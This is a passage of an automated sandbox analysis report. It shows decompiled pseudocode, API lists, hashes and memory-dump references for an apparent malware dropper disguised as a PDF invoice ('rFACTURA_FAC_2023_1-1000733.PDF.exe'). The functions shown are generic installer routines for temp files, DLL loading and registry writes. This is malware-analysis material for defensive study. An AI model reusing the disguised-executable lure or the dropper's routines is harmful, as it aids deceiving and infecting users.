API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 20aa65f000be929b1e11d1728d76fe9e6b564b96cf9baf0a42ebe1ff6a429860
Instruction ID: 54fc0906511a0d38b77c2dbc449d7618901aa97d03555d0a48212fe36839b6ac
Opcode Fuzzy Hash: 20aa65f000be929b1e11d1728d76fe9e6b564b96cf9baf0a42ebe1ff6a429860
Instruction Fuzzy Hash: A9218C71900618BACF11AFA6DD84EDFBF74EF85350F10807AF905B22A0C7794A40CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004065C9 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004065C9(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}

0x004065e0
0x004065e9
0x004065eb
0x004065eb
0x004065ef
0x00406602
0x004065fc
0x004065fc
0x004065fc
0x0040661b
0x0040662f
0x00406636

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065E0
wsprintfW.USER32 ref: 0040661B
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040662F

Strings

%s%S.dll, xrefs: 00406615
\, xrefs: 004065F1
UXTHEME, xrefs: 004065D2

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
Instruction ID: 20a568d0c0fc1602bd6380e0cb5a56c4d8b7367864d21650c92abf75bc562668
Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
Instruction Fuzzy Hash: E5F0F670500219AADB14AB64ED0DF9B366CAB00304F10447AA646F11D1EBB8DA24CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004030FA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E004030FA(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				short _v152;
				void* _t65;
				void* _t69;
				long _t70;
				intOrPtr _t74;
				long _t75;
				intOrPtr _t76;
				void* _t77;
				int _t87;
				intOrPtr _t91;
				intOrPtr _t94;
				long _t95;
				signed int _t96;
				int _t97;
				int _t98;
				intOrPtr _t99;
				void* _t100;
				void* _t101;

				_t96 = _a16;
				_t91 = _a12;
				_v12 = _t96;
				if(_t91 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t91;
				if(_t91 == 0) {
					_v16 = 0x78f6d8;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E00403308( *0x7a8a98 + _t62);
				}
				if(E004032F2( &_a16, ?str?) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t91 != 0) {
							if(_a16 < _t96) {
								_t96 = _a16;
							}
							if(E004032F2(_t91, _t96) != 0) {
								_v8 = _t96;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t91) {
							goto L44;
						}
						_t87 = _v12;
						while(1) {
							_t97 = _a16;
							if(_a16 >= _t87) {
								_t97 = _t87;
							}
							if(E004032F2(0x78b6d8, _t97) == 0) {
								goto L41;
							}
							_t69 = E00405E03(_a8, 0x78b6d8, _t97); // executed
							if(_t69 == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t97;
							_a16 = _a16 - _t97;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40ce38 =  *0x40ce38 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40ce20 = 0xb;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t98 = 0x4000;
						if(_a16 < 0x4000) {
							_t98 = _a16;
						}
						if(E004032F2(0x78b6d8, _t98) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t98;
						 *0x40ce10 = 0x78b6d8;
						 *0x40ce14 = _t98;
						while(1) {
							_t94 = _v16;
							 *0x40ce18 = _t94;
							 *0x40ce1c = _v12;
							_t74 = E0040679A(0x40ce10);
							_v24 = _t74;
							if(_t74 < 0) {
								break;
							}
							_t99 =  *0x40ce18; // 0x7924d8
							_t100 = _t99 - _t94;
							_t75 = GetTickCount();
							_t95 = _t75;
							if(( *0x7a8af4 & 0x00000001) != 0 && (_t75 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t101 = _t101 + 0xc;
								E004052C3(0,  &_v152); // executed
								_v20 = _t95;
							}
							if(_t100 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t76 =  *0x40ce18; // 0x7924d8
									_v8 = _v8 + _t100;
									_v12 = _v12 - _t100;
									_v16 = _t76;
									L23:
									if(_v24 != 4) {
										continue;
									}
									goto L44;
								}
								_t77 = E00405E03(_a8, _v16, _t100); // executed
								if(_t77 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t100;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}

0x00403105
0x00403109
0x0040310c
0x00403111
0x00403113
0x00403113
0x0040311a
0x0040311e
0x00403123
0x00403125
0x00403125
0x0040312c
0x00403131
0x0040313c
0x0040313c
0x0040314e
0x004032e0
0x004032e0
0x00000000
0x00403154
0x00403158
0x0040328d
0x004032d0
0x004032d2
0x004032d2
0x004032de
0x004032e5
0x004032e8
0x00000000
0x00000000
0x00000000
0x00000000
0x004032de
0x00403292
0x00000000
0x00000000
0x00403294
0x00403297
0x0040329a
0x0040329d
0x0040329f
0x0040329f
0x004032af
0x00000000
0x00000000
0x004032b6
0x004032bd
0x00403287
0x00403287
0x004032e2
0x004032e2
0x00000000
0x004032e2
0x004032bf
0x004032c2
0x004032c9
0x00000000
0x00000000
0x00000000
0x004032cb
0x00000000
0x00403297
0x00403164
0x00403166
0x0040316d
0x0040316d
0x00403174
0x0040317a
0x00403181
0x00403184
0x00000000
0x00000000
0x00000000
0x00000000
0x0040318a
0x0040318a
0x0040318a
0x00403192
0x00403194
0x00403194
0x004031a5
0x00000000
0x00000000
0x004031ab
0x004031ae
0x004031b4
0x004031ba
0x004031ba
0x004031c5
0x004031cb
0x004031d0
0x004031d7
0x004031da
0x00000000
0x00000000
0x004031e0
0x004031e6
0x004031e8
0x004031f1
0x004031f3
0x00403224
0x0040322a
0x00403236
0x0040323b
0x0040323b
0x00403240
0x0040327b
0x00000000
0x00000000
0x00000000
0x00403242
0x00403246
0x0040325d
0x00403262
0x00403265
0x00403268
0x0040326b
0x0040326f
0x00000000
0x00000000
0x00000000
0x00403275
0x0040324f
0x00403256
0x00000000
0x00000000
0x00403258
0x00000000
0x00403258
0x00403240
0x00403283
0x00000000
0x00403283
0x00000000
0x0040318a

APIs

GetTickCount.KERNEL32 ref: 00403164
GetTickCount.KERNEL32 ref: 004031E8
MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 00403211
wsprintfW.USER32 ref: 00403224

Strings

... %d%%, xrefs: 0040321E

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: 5d95faed883021d29135786fab1021639b0595a9b4acb09984627cea9783b19b
Instruction ID: 4304c27296c3acdf0d2a87061290089073c1970791b1d07264e817265a7bbb17
Opcode Fuzzy Hash: 5d95faed883021d29135786fab1021639b0595a9b4acb09984627cea9783b19b
Instruction Fuzzy Hash: 3C516C31801219EBCB10DF65DA45A9F7BA8AF45766F1442BFE810B72C0C7788F51CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00405792 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405792(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f0;
				_v36.Group = 0x4083f0;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e0;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x0040579d
0x004057a1
0x004057a4
0x004057aa
0x004057ae
0x004057b2
0x004057ba
0x004057c1
0x004057c7
0x004057ce
0x004057d5
0x004057dd
0x004057df
0x00000000
0x004057df
0x004057e9
0x004057f0
0x00405806
0x00000000
0x00000000
0x00000000
0x00405808
0x0040580c

APIs

CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057D5
GetLastError.KERNEL32 ref: 004057E9
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004057FE
GetLastError.KERNEL32 ref: 00405808

Strings

C:\Users\user\Desktop, xrefs: 00405792

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\Desktop
API String ID: 3449924974-3370423016
Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
Instruction ID: 488e367ac99084f0472557c0a26963b348c4b9c4a011ef6404f7c6369f031e52
Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
Instruction Fuzzy Hash: 03011A71C00619DADF009FA1C9447EFBBB4EF14354F00803AD945B6281D7789618CFE9

Uniqueness

Uniqueness Score: -1.00%

Function 00405D80 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405D80(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a55c; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}

0x00405d86
0x00405d8c
0x00405d8d
0x00405d8d
0x00405d92
0x00405d93
0x00405d96
0x00405d9b
0x00405d9e
0x00405da8
0x00405db5
0x00405db9
0x00405dc1
0x00000000
0x00000000
0x00405dc5
0x00000000
0x00405dc7
0x00405dc7
0x00405dc7
0x00405dca
0x00405dcd
0x00405dcd
0x00405dd0
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00405D9E
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe",0040334E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,0040359C), ref: 00405DB9

Strings

"C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe", xrefs: 00405D80
C:\Users\user\AppData\Local\Temp\, xrefs: 00405D85, 00405D89
nsa, xrefs: 00405D8D

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-3498057549
Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
Instruction ID: 49388a817ab8929663d32c184486222aab3b5007cea287540e7d96a1fedb5290
Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
Instruction Fuzzy Hash: 56F01D76600304FBEB009F69DD09E9BBBA9EF95750F11807BE900A6290E6B099548B64

Uniqueness

Uniqueness Score: -1.00%

Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E10001759(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				struct HINSTANCE__* _t34;
				void* _t36;
				intOrPtr _t38;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t50;
				intOrPtr _t53;
				signed int _t57;
				signed int _t61;
				void* _t65;
				void* _t66;
				void* _t70;
				void* _t74;

				_t74 = __esi;
				_t66 = __edi;
				_t65 = __edx;
				 *0x1000406c = _a8;
				 *0x10004070 = _a16;
				 *0x10004074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1);
				_push("true");
				_t34 = E10001B18();
				_t50 = _t34;
				if(_t50 == 0) {
					L28:
					return _t34;
				} else {
					if( *((intOrPtr*)(_t50 + 4)) != 1) {
						E10002286(_t50);
					}
					_push(_t50);
					E100022D0(_t65);
					_t53 =  *((intOrPtr*)(_t50 + 4));
					if(_t53 == 0xffffffff) {
						L14:
						if(( *(_t50 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t50 + 4)) == 0) {
								_t34 = E100024A4(_t50);
							} else {
								_push(_t74);
								_push(_t66);
								_t12 = _t50 + 0x1018; // 0x1018
								_t57 = 8;
								memcpy( &_v36, _t12, _t57 << 2);
								_t38 = E100015B4(_t50);
								_t15 = _t50 + 0x1018; // 0x1018
								_t70 = _t15;
								 *((intOrPtr*)(_t50 + 0x1020)) = _t38;
								 *_t70 = 4;
								E100024A4(_t50);
								_t61 = 8;
								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
							}
						} else {
							E100024A4(_t50);
							_t34 = GlobalFree(E10001272(E100015B4(_t50)));
						}
						if( *((intOrPtr*)(_t50 + 4)) != 1) {
							_t34 = E10002467(_t50);
							if(( *(_t50 + 0x1010) & 0x00000040) != 0 &&  *_t50 == 1) {
								_t34 =  *(_t50 + 0x1008);
								if(_t34 != 0) {
									_t34 = FreeLibrary(_t34);
								}
							}
							if(( *(_t50 + 0x1010) & 0x00000020) != 0) {
								_t34 = E1000153D( *0x10004068);
							}
						}
						if(( *(_t50 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							_t36 = GlobalFree(_t50); // executed
							return _t36;
						}
					}
					_t44 =  *_t50;
					if(_t44 == 0) {
						if(_t53 != 1) {
							goto L14;
						}
						E10002B57(_t50);
						L12:
						_t50 = _t44;
						L13:
						goto L14;
					}
					_t45 = _t44 - 1;
					if(_t45 == 0) {
						L8:
						_t44 = E1000289C(_t53, _t50); // executed
						goto L12;
					}
					_t46 = _t45 - 1;
					if(_t46 == 0) {
						E10002640(_t50);
						goto L13;
					}
					if(_t46 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x10001759
0x10001759
0x10001759
0x10001763
0x1000176b
0x10001778
0x10001786
0x10001789
0x1000178b
0x10001790
0x10001795
0x100018a8
0x100018a8
0x1000179b
0x1000179f
0x100017a2
0x100017a7
0x100017a8
0x100017a9
0x100017af
0x100017b5
0x100017e5
0x100017ec
0x10001810
0x1000184f
0x10001812
0x10001812
0x10001813
0x10001816
0x1000181c
0x10001820
0x10001823
0x10001828
0x10001828
0x1000182f
0x10001835
0x1000183b
0x10001847
0x10001848
0x1000184b
0x100017ee
0x100017ef
0x10001804
0x10001804
0x10001859
0x1000185c
0x10001869
0x10001870
0x10001878
0x1000187b
0x1000187b
0x10001878
0x10001888
0x10001890
0x10001895
0x10001888
0x1000189d
0x00000000
0x1000189f
0x100018a0
0x00000000
0x100018a0
0x1000189d
0x100017b9
0x100017bc
0x100017da
0x00000000
0x00000000
0x100017dd
0x100017e2
0x100017e2
0x100017e4
0x00000000
0x100017e4
0x100017be
0x100017bf
0x100017c7
0x100017c8
0x00000000
0x100017c8
0x100017c1
0x100017c2
0x100017d0
0x00000000
0x100017d0
0x100017c5
0x00000000
0x00000000
0x00000000
0x100017c5

APIs

Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D

GlobalFree.KERNEL32(00000000), ref: 10001804
FreeLibrary.KERNEL32(?), ref: 1000187B
GlobalFree.KERNELBASE(00000000), ref: 100018A0

Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,8BC3C95B), ref: 100022B8

Part of subcall function 10002640: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2

Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020), ref: 100015CD

Strings

, xrefs: 10001881

Memory Dump Source

Source File: 00000000.00000002.1463432748.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1463396007.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1463469816.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1463524699.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: Global$Free$Alloc$Librarylstrcpy
String ID:
API String ID: 1791698881-3916222277
Opcode ID: 0483f3173a4470b9256ae29dd6c5e6dea881cc340ce9ef3905353ea367717f55
Instruction ID: 65685ba44f5e0dd4e22f20931bb662b0f8110762eb821eef9687284fed8b6370
Opcode Fuzzy Hash: 0483f3173a4470b9256ae29dd6c5e6dea881cc340ce9ef3905353ea367717f55
Instruction Fuzzy Hash: 4A31AC75804241AAFB14DF649CC9BDA37E8FF043D4F158065FA0AAA08FDFB4A984C761

Uniqueness

Uniqueness Score: -1.00%

Function 004023DE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E004023DE(void* __eax, int __ebx, intOrPtr __edx) {
				void* _t20;
				void* _t21;
				int _t24;
				long _t25;
				int _t30;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x18));
				_t34 = __eax;
				 *(_t39 - 0x4c) =  *(_t39 - 0x14);
				 *(_t39 - 0x3c) = E00402C37(2);
				_t20 = E00402C37(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402CC7(_t42, _t34, _t20, 2); // executed
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402C37(0x23);
						_t24 = lstrlenW(0x40b5a8) + _t29 + 2;
					}
					if(_t37 == 4) {
						 *0x40b5a8 = E00402C15(3);
						 *((intOrPtr*)(_t39 - 0x30)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E004030FA( *((intOrPtr*)(_t39 - 0x1c)), _t30, 0x40b5a8, 0x1800);
					}
					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x3c), _t30,  *(_t39 - 0x4c), 0x40b5a8, _t24); // executed
					if(_t25 == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey(); // executed
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *(_t39 - 4);
				return 0;
			}

0x004023de
0x004023de
0x004023de
0x004023e1
0x004023e8
0x004023f2
0x004023f5
0x004023fe
0x00402405
0x0040240c
0x0040240f
0x00402415
0x0040241f
0x00402423
0x0040242e
0x0040242e
0x00402435
0x0040243f
0x00402445
0x00402448
0x00402448
0x0040244c
0x00402458
0x00402458
0x00402469
0x00402471
0x00402473
0x00402473
0x00402476
0x00402551
0x00402551
0x00402ac2
0x00402ace

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,00000023,?,00000000,00000002,00000011,00000002), ref: 00402429
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402469
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402551

Strings

C:\Users\user\AppData\Local\Temp\nsp1D68.tmp, xrefs: 0040241A, 0040243F, 00402453, 0040245E

Memory Dump Source

